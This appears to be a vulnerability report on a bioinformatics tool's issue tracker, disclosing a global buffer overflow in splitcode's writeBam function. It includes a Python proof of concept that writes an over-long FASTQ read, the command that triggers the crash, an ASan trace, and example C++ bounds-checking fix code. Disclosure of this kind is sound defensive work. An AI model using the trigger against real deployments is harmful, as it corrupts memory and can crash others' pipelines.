Global Buffer Overflow in writeBam #53

@sqdshguy

Description

There is a buffer overflow vulnerability in src/ProcessReads.cpp within the MasterProcessor::writeBam function.

The function declares a fixed-size static buffer buf1 of 32,768 bytes to construct the BAM record. It performs memcpy and direct array indexing to write the Read Name, Sequence, and Quality data into this buffer without verifying if the data fits.

If the input FASTQ file contains a read with a sequence length exceeding approximately 21,800 base pairs, the calculated write offsets exceed the 32KB limit, causing a write out-of-bounds. This results in memory corruption in the global data section.

PoC

```python
# gen_poc.py: write a single-record FASTQ whose read is far longer than the
# 32,768-byte static buffer writeBam copies into.
filename = "payload.fastq"
read_len = 35000
header = "@LongRead"
seq = "A" * read_len
sep = "+"
qual = "I" * read_len  # Phred+33 quality 40 for every base

with open(filename, "w") as f:
    f.write(f"{header}\n{seq}\n{sep}\n{qual}\n")

print(f"Generated {filename} with read length {read_len}")
```

```shell
python3 gen_poc.py
./splitcode --out-bam --trim-only -o out.bam payload.fastq
```

ASan report:

```
==5161==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0001022f28e3 ...
WRITE of size 16 at 0x0001022f28e3 thread T1
    #0 0x00010222a1dc in MasterProcessor::writeBam(...) ProcessReads.cpp:887
    #1 0x00010221a84c in MasterProcessor::writeOutput(...) ProcessReads.cpp:750
    ...
0x0001022f28e3 is located 3 bytes after global variable 'MasterProcessor::writeBam(...)::buf1' defined in '/.../src/ProcessReads.cpp' (0x0001022ea8e0) of size 32768
```
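As an added example (not code from the splitcode project), this is the check writeBam would need before it copies into buf1: compute the BAM record size from the read name, sequence and quality lengths first, and refuse the record when it exceeds the buffer. The field values chosen for the unmapped record, the helper names and `kBuf1Size` (mirroring the 32,768-byte buffer in the report) are assumptions made for the illustration. With the report's 8-character read name, the largest read that fits is 21,815 bases, which is the ~21,800 threshold described above.

```cpp
// Added example (not splitcode's code): build a BAM record into a fixed
// buffer only after checking that it fits. The layout follows the BAM
// specification; the fixed field values used for an unmapped record are
// assumptions made for this illustration.
#include <cctype>
#include <cstdint>
#include <cstring>
#include <string>
#include <vector>

// Fixed part of a BAM record body after block_size:
// refID(4) pos(4) l_read_name(1) mapq(1) bin(2) n_cigar_op(2) flag(2)
// l_seq(4) next_refID(4) next_pos(4) tlen(4) = 32 bytes.
constexpr size_t kBamFixedBody = 32;
// Same size as the static buf1 the report describes (assumption: mirrors the report).
constexpr size_t kBuf1Size = 32768;

// Total bytes a record occupies: 4-byte block_size, fixed body, NUL-terminated
// read name, 4 bytes per CIGAR op, 4-bit packed sequence, one byte per quality.
size_t bam_record_bytes(size_t name_len, size_t seq_len, size_t n_cigar) {
    return 4 + kBamFixedBody + (name_len + 1) + 4 * n_cigar
         + (seq_len + 1) / 2 + seq_len;
}

// Largest read length whose record (name of name_len characters, no CIGAR)
// fits in cap bytes. Binary search; bam_record_bytes is monotone in seq_len.
size_t max_read_len_for(size_t cap, size_t name_len) {
    size_t lo = 0, hi = cap;
    while (lo < hi) {
        size_t mid = (lo + hi + 1) / 2;
        if (bam_record_bytes(name_len, mid, 0) <= cap) lo = mid; else hi = mid - 1;
    }
    return lo;
}

// 4-bit nucleotide code from the BAM alphabet "=ACMGRSVTWYHKDBN".
static uint8_t nt16(char c) {
    static const char codes[] = "=ACMGRSVTWYHKDBN";
    const char u = static_cast<char>(std::toupper(static_cast<unsigned char>(c)));
    for (uint8_t i = 0; i < 16; ++i) if (codes[i] == u) return i;
    return 15;  // anything else is written as N
}

// Writes an unmapped record for (name, seq, qual) into buf. Returns the byte
// count written, or 0 if the record would not fit in cap bytes. The size check
// runs before the first memcpy, which is the check the report says is missing.
size_t write_bam_record(uint8_t* buf, size_t cap, const std::string& name,
                        const std::string& seq, const std::string& qual) {
    if (seq.size() != qual.size() || name.size() > 254) return 0;
    const size_t need = bam_record_bytes(name.size(), seq.size(), 0);
    if (need > cap) return 0;  // refuse instead of writing out of bounds

    uint8_t* p = buf;
    auto put32 = [&p](int32_t v) { std::memcpy(p, &v, 4); p += 4; };
    auto put16 = [&p](uint16_t v) { std::memcpy(p, &v, 2); p += 2; };
    put32(static_cast<int32_t>(need - 4));         // block_size
    put32(-1);                                     // refID: unmapped
    put32(-1);                                     // pos
    *p++ = static_cast<uint8_t>(name.size() + 1);  // l_read_name incl. NUL
    *p++ = 255;                                    // mapq unavailable
    put16(4680);                                   // bin for an unmapped read
    put16(0);                                      // n_cigar_op
    put16(0x4);                                    // flag: unmapped
    put32(static_cast<int32_t>(seq.size()));       // l_seq
    put32(-1);                                     // next_refID
    put32(-1);                                     // next_pos
    put32(0);                                      // tlen
    std::memcpy(p, name.c_str(), name.size() + 1);
    p += name.size() + 1;
    for (size_t i = 0; i < seq.size(); i += 2) {   // pack two bases per byte
        uint8_t hi = nt16(seq[i]);
        uint8_t lo = (i + 1 < seq.size()) ? nt16(seq[i + 1]) : 0;
        *p++ = static_cast<uint8_t>((hi << 4) | lo);
    }
    for (char q : qual) *p++ = static_cast<uint8_t>(q - 33);  // Phred+33 -> raw
    return static_cast<size_t>(p - buf);
}
```

Either outcome of the check is acceptable in a real fix: skip the record with an error, or size the buffer per record (for instance a `std::vector<uint8_t>` resized to `bam_record_bytes(...)` before writing). What matters is that the size is computed and compared before the first copy, so a long FASTQ read is rejected rather than written past the end of a global buffer.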
